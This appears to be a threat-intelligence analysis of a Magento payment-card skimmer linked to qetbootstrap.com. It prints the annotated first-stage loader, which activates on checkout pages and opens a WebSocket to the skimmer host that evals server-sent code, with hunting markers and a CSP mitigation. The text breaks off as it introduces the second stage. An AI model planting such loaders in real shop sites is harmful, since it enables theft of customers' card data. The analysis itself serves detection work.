qetbootstrap.com skimmer

wss exfiltration

ASN ZERGRUSH (39622)

Sample

The first stage of the skimmer is injected into Magento files or into the database:


// Analyst notes: first-stage loader, written to resemble an analytics snippet.
// It is an immediately-invoked function whose eight parameters are bound by the
// call at the bottom:
//   i = 'jb'            (overwritten below, never used as passed)
//   s = document
//   h = 'style'
//   k = second-stage bootstrap code (see the note above the call)
//   l = window.location
//   o = 'Y2hlY2tvdXQ' + '='  -> base64 for "checkout"
//   c = a google-analytics.com URL (overwritten below, never requested here)
//   m = window
// Nothing visible here inserts an element into the DOM; the element handling
// looks like cover for the new Function(...) call.
(function(i, s, h, k, l, o, c, m) {
    // Stores the base64 marker on window under a name close to the one used by
    // the Google Analytics snippet; presumably camouflage -- confirm in triage.
    m['GoogleAnalyticsObjects'] = o;
    // Creates a detached <style> element and looks up the first existing one.
    // Both overwrite the passed-in 'c' and 'i' values.
    c = s.createElement(h),
    i = s.getElementsByTagName(h)[0];
    // Gate: only proceed when the current URL matches the decoded marker
    // ("checkout"), so the loader is inactive on other pages.
    if (l.href.match(new RegExp(atob(o)))) {
        c.async = 1;
        // Decodes k and runs it as a function body. Assigning the result to
        // c.src on a detached <style> element has no visible effect; what
        // matters is the side effect of the decoded code.
        c.src = new Function(atob(k)).call(this);
    }
}
// NOTE(review): the fourth argument is shown already decoded, and its nested
// single quotes mean this listing does not parse as written. atob(k) above
// implies the injected sample carries it base64-encoded -- confirm against a
// raw copy.
// Decoded, it opens a WebSocket to the skimmer host on port 8444 and passes
// every received message to eval(), so the server controls what runs in the
// checkout page. Useful hunting markers in Magento files and database content:
// new Function(atob(...)), and a WebSocket onmessage handler that calls eval.
// A CSP connect-src allowlist would block the wss:// connection.
)('jb', document, 'style', 'window.bootstrap_web = new WebSocket('wss://qetbootstrap.com:8444');window.bootstrap_web.onmessage=function(e){eval(e.data);};', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);

The second stage of the skimmer is retrieved from an external domain and then run in the victim’s browser when they open the checkout page: